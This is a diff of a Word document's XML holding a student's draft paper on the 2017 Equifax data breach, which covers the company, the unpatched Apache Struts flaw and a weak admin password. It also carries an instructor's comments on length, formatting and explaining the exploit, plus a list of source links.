--- a/_seniorI/CLINIC/Equifax Data Breach.docx
+++ b/_seniorI/CLINIC/Equifax Data Breach.docx
@@ -4,73 +4,370 @@
   <w:body>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:commentRangeStart w:id="0"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Equifax Data Breach – American Vulnerability</w:t>
-      </w:r>
-      <w:commentRangeEnd w:id="0"/>
+        <w:spacing w:before="240" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Equifax Incorporate is a credit reporting agency</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> that distributes</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> information on 800 million individual consumers </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">along with </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>88 million businesses worldwide</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Equifax sells credit monitoring and fraud-prevention services directly to consumers</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>The incorporate owns</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">massive amounts of data </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>on consumers and possess the ability to</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> turn over</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the said data</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> anyone who want</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to know credit </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>of certain</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> individuals.</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="240" w:line="276" w:lineRule="auto"/>
+        <w:ind w:firstLine="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3E588E8E" wp14:editId="7A491745">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>3427095</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>313055</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="2449195" cy="2324100"/>
+            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
+            <wp:wrapTight wrapText="bothSides">
+              <wp:wrapPolygon edited="0">
+                <wp:start x="0" y="0"/>
+                <wp:lineTo x="0" y="21423"/>
+                <wp:lineTo x="21505" y="21423"/>
+                <wp:lineTo x="21505" y="0"/>
+                <wp:lineTo x="0" y="0"/>
+              </wp:wrapPolygon>
+            </wp:wrapTight>
+            <wp:docPr id="1" name="Picture 1" descr="Image result for “Apache Struts”"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 1" descr="Image result for “Apache Struts”"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill rotWithShape="1">
+                    <a:blip r:embed="rId6">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect l="22436" r="22436"/>
+                    <a:stretch/>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2449195" cy="2324100"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                    <a:extLst>
+                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
+                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
+                      </a:ext>
+                    </a:extLst>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+            <wp14:sizeRelH relativeFrom="page">
+              <wp14:pctWidth>0</wp14:pctWidth>
+            </wp14:sizeRelH>
+            <wp14:sizeRelV relativeFrom="page">
+              <wp14:pctHeight>0</wp14:pctHeight>
+            </wp14:sizeRelV>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>The Equifax breach had a major failure on the internal control of security system. The underlying causes of this breach</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="240" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="240" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:commentRangeStart w:id="1"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Exploit</w:t>
+      </w:r>
+      <w:commentRangeEnd w:id="1"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CommentReference"/>
-        </w:rPr>
-        <w:commentReference w:id="0"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Who is Equifax</w:t>
-      </w:r>
-      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="1"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Summary</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:commentReference w:id="1"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="240" w:line="276" w:lineRule="auto"/>
+        <w:ind w:firstLine="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>The publicized and known specific cause of the Equifax breach was a failure to install a well-publicized security patch to an “Apache Struts” vulnerability. An earlier 2017 Equifax breach involved an IT systems administrator using an insecure password that did not comply with best practices, or even Equifax’s own policies.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="240" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="240" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>System Affected</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="240" w:line="276" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:sz w:val="24"/>
@@ -84,82 +381,155 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Exploit</w:t>
+        <w:t>Mitigations</w:t>
       </w:r>
       <w:commentRangeEnd w:id="2"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CommentReference"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:commentReference w:id="2"/>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>System Affected</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:commentRangeStart w:id="3"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Mitigations</w:t>
-      </w:r>
-      <w:commentRangeEnd w:id="3"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-        </w:rPr>
-        <w:commentReference w:id="3"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
+        <w:spacing w:before="240" w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Resources</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="240" w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId10" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
+          </w:rPr>
+          <w:t>https://www.fastcompany.com/40464730/equifax-has-a-super-shady-history-that-might-explain-its-shady-present</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="240" w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId11" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
+          </w:rPr>
+          <w:t>https://en.wikipedia.org/wiki/Equifax</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="240" w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId12" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
+          </w:rPr>
+          <w:t>https://www.cpajournal.com/2017/12/15/equifax-data-breach/</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="240" w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId13" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
+          </w:rPr>
+          <w:t>https://www.equifax.com/business/all-products/</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="240" w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="240" w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="240" w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:sectPr>
+      <w:headerReference w:type="first" r:id="rId14"/>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
       <w:cols w:space="720"/>
+      <w:titlePg/>
       <w:docGrid w:linePitch="360"/>
     </w:sectPr>
   </w:body>
@@ -168,12 +538,12 @@
 
 <file path=word/comments.xml><?xml version="1.0" encoding="utf-8"?>
 <w:comments xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid wp14">
-  <w:comment w:id="0" w:author="Josh Gould" w:date="2018-10-22T08:50:00Z" w:initials="JG">
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CommentText"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+  <w:comment w:id="1" w:author="Josh Gould" w:date="2018-10-22T09:01:00Z" w:initials="JG">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -186,33 +556,11 @@
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>I’d like the papers to be around 5 pages in length, you can go over if you want. We are talking single spaced, size 12 Arial, 1” margins all around.  If you want to double space your paper for clarity, I’m fine with that but obviously it needs to be 10 pages in that case</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CommentText"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>I’m fine with up to an entire page being diagrams/graphics, as long as they are relevant and enhance the paper. Cite your sources using whatever tool you want, I love those automatic online citation tools</w:t>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>make sure you explain details of how the exploit worked technically. Like specifically: it exploited a buffer overflow vulnerability in the Microsoft XX service that resulted in full administrator access.  Maybe expand upon what a buffer overflow is.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -222,37 +570,6 @@
     </w:p>
   </w:comment>
   <w:comment w:id="2" w:author="Josh Gould" w:date="2018-10-22T09:01:00Z" w:initials="JG">
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-        </w:rPr>
-        <w:annotationRef/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>make sure you explain details of how the exploit worked technically. Like specifically: it exploited a buffer overflow vulnerability in the Microsoft XX service that resulted in full administrator access.  Maybe expand upon what a buffer overflow is.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CommentText"/>
-      </w:pPr>
-    </w:p>
-  </w:comment>
-  <w:comment w:id="3" w:author="Josh Gould" w:date="2018-10-22T09:01:00Z" w:initials="JG">
     <w:p>
       <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="276" w:lineRule="auto"/>
@@ -298,7 +615,6 @@
 
 <file path=word/commentsExtended.xml><?xml version="1.0" encoding="utf-8"?>
